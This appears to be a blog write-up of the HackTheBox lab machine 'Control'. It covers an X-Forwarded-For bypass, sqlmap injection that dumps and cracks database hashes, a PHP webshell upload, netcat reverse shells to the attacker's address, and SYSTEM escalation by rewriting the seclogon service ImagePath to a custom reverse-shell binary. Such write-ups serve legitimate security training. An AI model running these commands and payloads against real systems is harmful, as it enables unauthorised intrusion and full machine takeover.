Hackthebox – Control

As with any machine, Control starts with a port scan.

root@kalivm:~/Control# nmap -sTV -p 1-65535 -oN fullscan_tcp 10.10.10.167
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-08 08:01 CEST
# Nmap 7.80 scan initiated Sun Mar 15 15:43:57 2020 as: nmap -sTV -p 1-65535 -oN fullscan_tcp 10.10.10.167
Nmap scan report for 10.10.10.167
Host is up (0.023s latency).
Not shown: 65530 filtered ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 10.0
135/tcp   open  msrpc   Microsoft Windows RPC
3306/tcp  open  mysql?
49666/tcp open  msrpc   Microsoft Windows RPC
49667/tcp open  msrpc   Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.80%I=7%D=3/15%Time=5E6E4110%P=x86_64-pc-linux-gnu%r(NU
SF:LL,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.43'\x20is\x20not\x20allow
SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(RTSPRequest,
SF:4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.43'\x20is\x20not\x20allowed\
SF:x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(DNSVersionBindR
SF:eqTCP,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.43'\x20is\x20not\x20al
SF:lowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 537.85 seconds

The only interesting ports are 80 and 3306, but for 3306 I Would probably need credentials so I start browsing through the website.

Fidelity… I thought this box was named Control.. but ok.. sure, lets go with this.

After clicking the admin link, I get this error stating that it needs a certain header. I recalled this X-Forwarded-For header being something, used as verification of forwarding through proxies, but all I needed was a valid source to let it come from.

Looking into the source of the main page, showed me this IP address. I might as well try that as a header

Using burpsuite as proxy, I set the scope to 10.10.10.167 and set the header to be added to all requests sent by my browser.

After changing my browser to use Burp as Proxy, I can browse the admin pages. These pages contain lots of fields and buttons…. So I start messing around with them a bit.

After trying many of the options, I find that only the searchfield returns this error, so I continue with that. While inspecting the traffic with Burp I see that the productName variable is sent, so I throw that in sqlmap.

root@kalivm:~/Control# sqlmap -u http://10.10.10.167/search_products.php --data productName=x --proxy=http://localhost:8080 -a 
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4.3#stable}
|_ -| . [.]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org
----snip---- 
[09:04:08] [INFO] fetching database users
database management system users [6]:
[*] 'hector'@'localhost'
[*] 'manager'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'fidelity'
[*] 'root'@'localhost'
---snip---
[09:04:36] [INFO] cracked password 'l3tm3!n' for user 'manager'
database management system users password hashes:
[*] hector [1]:
    password hash: *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
[*] manager [1]:
    password hash: *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDAtext password: l3tm3!n
[*] root [1]:
    password hash: *0A4A5CAD344718DC418035A1F4D292BA603134D8
---snip---

Using Burpsuite as proxy, since the x-forwarded-for header was required too, sqlmap quite quickly determines that the provided parameter is vulnerable, and after some messing with sqlmap, I use the -a option to just dump everything it can.

Not only does it get the password hashes for users Manager (l3tm3!n) and Hector (not cracked), it also shows that all users have ‘File’ permissions which indicates that they can write to the filesystem. This might be my way in!

root@kalivm:~/Control# sqlmap -u http://10.10.10.167/search_products.php --data productName=x --proxy=http://localhost:8080 --file-write=/opt/wwwolf-php-webshell/webshell.php --file-dest=c:/inetpub/wwwroot/sedje.php --batch
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4.3#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org
---snip---
do you want confirmation that the local file '/opt/wwwolf-php-webshell/webshell.php' has been successfully written on the back-end DBMS file system ('c:/inetpub/wwwroot/sedje.php')? [Y/n] Y
[09:30:44] [INFO] the local file '/opt/wwwolf-php-webshell/webshell.php' and the remote file 'c:/inetpub/wwwroot/sedje.php' have the same size (7205 B)
[09:30:45] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.167'

After trying several files including the nishang powershell reverse shell and the common php-reverse shell on kali, many attempts got blocked for further writing so it appeared as if some security tool was active. After trying several shells, I was finally able to upload this wolf-shell to disk!

Using this shell, I created a new temp directory and uploaded nc.exe.

root@kalivm:~/Control# rlwrap nc -nlvp 9000
Listening on 0.0.0.0 9000
Connection received on 10.10.10.167 49673
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\temp> whoami
whoami
nt authority\iusr

Once that got uploaded, I could spawn my shell as iusr. Time to start looking around for more stuff on this system. After spending a lot of time enumerating things, I could not find any feasible way to escalate my privileges to another user. However, one person on discord mentioned that I should also look (again) at the obtained hashes from the SQL Dump. That was when I realized I had never cracked Hector’s password!

Both the root hash and Hector’s hash were thrown into crackstation, but only Hector’s hash got a result. So with this, I should be able to set my shell to Hector.

root@kalivm:~/Control# cat ~/exploit/powershell/getshell.ps1 
$username = 'Control\Hector'
$password = 'l33th4x0rhector'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential -ArgumentList $username,$securePassword
Invoke-Command -ComputerName 127.0.0.1 -Credential $credential -ScriptBlock {cmd /c powershell c:\temp\nc.exe 10.10.14.76 9003 -e powershell.exe}

This is where I combine my own appraoch for Hackthebox – Sniper with that of Ippsec. I create a simple powershell script with the credentials, and the netcat command back to my machine to get a shell as Hector.

PS C:\temp> iwr -uri http://10.10.14.76/powershell/getshell.ps1 -outfile sedje.ps1
iwr -uri http://10.10.14.76/powershell/getshell.ps1 -outfile sedje.ps1
PS C:\temp> ./sedje.ps1
./sedje.ps1
Program 'nc.exe' failed to run: Access is deniedAt line:1 char:1
    + CategoryInfo          : NotSpecified: (Program 'nc.exe...t line:1 char:1:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
    + PSComputerName        : 127.0.0.1

Thats weird, I cannot access nc.exe due to permission problems. After some googling about how to change permissions on it, I found something that was way more complex than the way its being done on linux, but hey, it might be worth a try.

PS C:\temp> $Acl = Get-Acl "c:\temp\"
$Acl = Get-Acl "c:\temp\
PS C:\temp> $Ar = New-Object  system.security.accesscontrol.filesystemaccessrule("Everyone","FullControl","Allow")
$Ar = New-Object  system.security.accesscontrol.filesystemaccessrule("Everyone","FullControl","Allow")
PS C:\temp> $Acl.SetAccessRule($Ar)
$Acl.SetAccessRule($Ar)
PS C:\temp> Set-Acl "C:\temp" $acl
Set-Acl "C:\temp" $acl
PS C:\temp> $Acl = Get-Acl "c:\temp\nc.exe"
$Acl = Get-Acl "c:\temp\nc.exe"
PS C:\temp> $Acl.SetAccessRule($Ar)
$Acl.SetAccessRule($Ar)
PS C:\temp> Set-Acl "C:\temp\nc.exe" $acl
Set-Acl "C:\temp\nc.exe" $acl
PS C:\temp> ./sedje.ps1
./sedje.ps1

Changing the ACL on nc.exe and c:\temp appeared to have worked! Now I should have a shell as Hector.

root@kalivm:~/Control# rlwrap nc -nlvp 9003
Listening on 0.0.0.0 9003
Connection received on 10.10.10.167 49678
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\Hector\Documents> whoami
whoami
control\hector

I do have a shell as Hector. So perhaps I can get the user flag now. But before doing so there is one thing I want to do.

PS C:\Users\Hector\Documents> del c:\temp\sedje.ps1
del c:\temp\sedje.ps1

In order to not make it too easy for anyone else reading the temp directory, I remove the ps1 file containing the username and password for Hector.

PS C:\Users\Hector\Documents> cd ..\desktop
cd ..\desktop
PS C:\Users\Hector\desktop> dir
dir

    Directory: C:\Users\Hector\desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        11/1/2019  12:33 PM             32 user.txt

PS C:\Users\Hector\desktop> type user.txt
type user.txt
d8782dd<NOFLAG>2c4b5ba77ef2d472b

And there is the flag! Time to obtain it and continue to privilege escalation.

Privilege escalation

So during the first hours of privilege escalation, I did not find much of interest except for this piece of PowerShell History for Hector. I looked at each of the commands but could still not find much useful content in their results.

PS C:\Users\Hector\desktop> (Get-PSReadlineOption).HistorySavePath
(Get-PSReadlineOption).HistorySavePath
C:\Users\Hector\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS C:\Users\Hector\desktop> type C:\Users\Hector\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\Users\Hector\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
get-childitem HKLM:\SYSTEM\CurrentControlset | format-list
get-acl HKLM:\SYSTEM\CurrentControlSet | format-list

However, at some point, I started discussing the box on Discord and someone told me to look into the services.

PS C:\temp> get-service
get-service
get-service : Cannot open Service Control Manager on computer '.'. This operation might require other privileges.
At line:1 char:1
+ get-service
+ ~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Get-Service], InvalidOperationException
    + FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.PowerShell.Commands.GetServiceCommand
 
PS C:\temp> sc.exe query
sc.exe query
[SC] OpenSCManager FAILED 5:

Access is denied.

The normal way of querying the services did not work though. All it got was either a permission denied or a InvalidOperationException error, so there is no easy way of listing them all.

PS C:\Users\Hector\desktop> get-acl HKLM:\SYSTEM\CurrentControlSet\Services\* | format-list
get-acl HKLM:\SYSTEM\CurrentControlSet\Services\* | format-list

Path   : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Data
Owner  : NT AUTHORITY\SYSTEM
Group  : NT AUTHORITY\SYSTEM
Access : APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  ReadKey
         NT AUTHORITY\SYSTEM Allow  FullControl
         CREATOR OWNER Allow  FullControl
         NT AUTHORITY\Authenticated Users Allow  ReadKey
         NT AUTHORITY\SYSTEM Allow  FullControl
         CONTROL\Hector Allow  FullControl
         BUILTIN\Administrators Allow  FullControl 
---snip---

After some research, I found that I could also query the registry for all services. Looking at the service permissions, it appeared as if Hector had FullControl permissions on all of them. This could be interesting, however, when trying to stop some of them, I got either a permission denied error or an Service Not found error. Perhaps I needed services that were not started yet.

PS C:\temp> $services = get-itemproperty -path "HKLM:\System\CurrentControlSet\Services\*" | Where-Object {$_.ObjectName -eq "LocalSystem" -and $_.Start -eq 3 }  | Select-Object -Property PSChildName
$services = get-itemproperty -path "HKLM:\System\CurrentControlSet\Services\*" | Where-Object {$_.ObjectName -eq "LocalSystem" -and $_.Start -eq 3 }  | Select-Object -Property PSChildName
PS C:\temp> foreach ($service in $services) { get-service -name $service.pschildname -erroraction 'silentlycontinue' | Where-Object {$_.Status -eq 'Stopped'} |Select-Object -Property Name } 
foreach ($service in $services) { get-service -name $service.pschildname -erroraction 'silentlycontinue' | Where-Object {$_.Status -eq 'Stopped'} |Select-Object -Property Name } 

Name                  
----                  
AppMgmt               
ConsentUxUserSvc      
DevicesFlowUserSvc    
EFS                   
NetSetupSvc           
NgcSvc                
PimIndexMaintenanceSvc
PrintWorkflowUserSvc  
RasAuto               
RSoPProv              
seclogon              
SecurityHealthService 
SensorService         
UnistoreSvc           
UserDataSvc           
vds                   
WaaSMedicSvc

Some more research online lead me to the queries above. They provided these services which were potential candidates for tampering with them. They were configured with Start-option 3 (Manual), configured to run as LocalSystem and were not (yet) started. Now all I needed was an executable to run with it, as when I run netcat as a service, it might probably be blocked by Defender, or be killed as soon as the service-start times out because it cannot background the service.

root@kalivm:~/Control# cat getnc.c
# include <stdio.h>
# include <stdlib.h>
# include <string.h>
int main(){
    char command[80];
    strcpy(command, "cmd /c c:\\temp\\nc.exe 10.10.14.76 9004 -e powershell");
    system(command);
    return 0;
}
root@kalivm:~/Control# x86_64-w64-mingw32-gcc -o getnc.exe getnc.c

So I crosscompile this simple executable which starts a new cmd command with a netcat connection back to my box.

PS C:\temp> iwr -uri http://10.10.14.76/windows/getnc.exe -outfile getnc.exe
iwr -uri http://10.10.14.76/windows/getnc.exe -outfile getnc.exe

I transfer the file from my kali box to the Windows target.

PS C:\temp> set-itemproperty -path "HKLM:\System\CurrentControlSet\Services\seclogon" -Name ImagePath -value "C:\temp\getnc.exe" 
set-itemproperty -path "HKLM:\System\CurrentControlSet\Services\seclogon" -Name ImagePath -value "C:\temp\getnc.exe"
PS C:\temp> get-itemproperty -path "HKLM:\System\CurrentControlSet\Services\seclogon"
get-itemproperty -path "HKLM:\System\CurrentControlSet\Services\seclogon"

Description        : @%SystemRoot%\system32\seclogon.dll,-7000
DisplayName        : @%SystemRoot%\system32\seclogon.dll,-7001
ErrorControl       : 1
FailureActions     : {128, 81, 1, 0...}
ImagePath          : C:\temp\getnc.exe
ObjectName         : LocalSystem
RequiredPrivileges : {SeTcbPrivilege, SeRestorePrivilege, SeBackupPrivilege, SeAssignPrimaryTokenPrivilege...}
Start              : 3
Type               : 32
PSPath             : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\seclogon
PSParentPath       : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services
PSChildName        : seclogon
PSDrive            : HKLM
PSProvider         : Microsoft.PowerShell.Core\Registry

From the list, I select the seclogon service as a candidate and reconfigure the ImagePath variable to contain my payload.

PS C:\temp> sc.exe start seclogon
sc.exe start seclogon
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

I start the service, and it crashes as expected. However, maybe I have got my System shell now if all went well.

root@kalivm:~/Control# rlwrap nc -nlvp 9004
Listening on 0.0.0.0 9004
Connection received on 10.10.10.167 49703
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\system

And it did! I’ve got a shell as SYSTEM user so I can now gain access to the root flag!

PS C:\Windows\system32> cd c:\users\administrator\desktop
cd c:\users\administrator\desktop
PS C:\users\administrator\desktop> dir
dir


    Directory: C:\users\administrator\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        11/1/2019  12:33 PM             32 root.txt


PS C:\users\administrator\desktop> type root.txt
type root.txt
8f8613f5<NOFLAG>36ef11def4cec1b1

And there it is! What a ride this was, and I learned a lot about the registry values!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.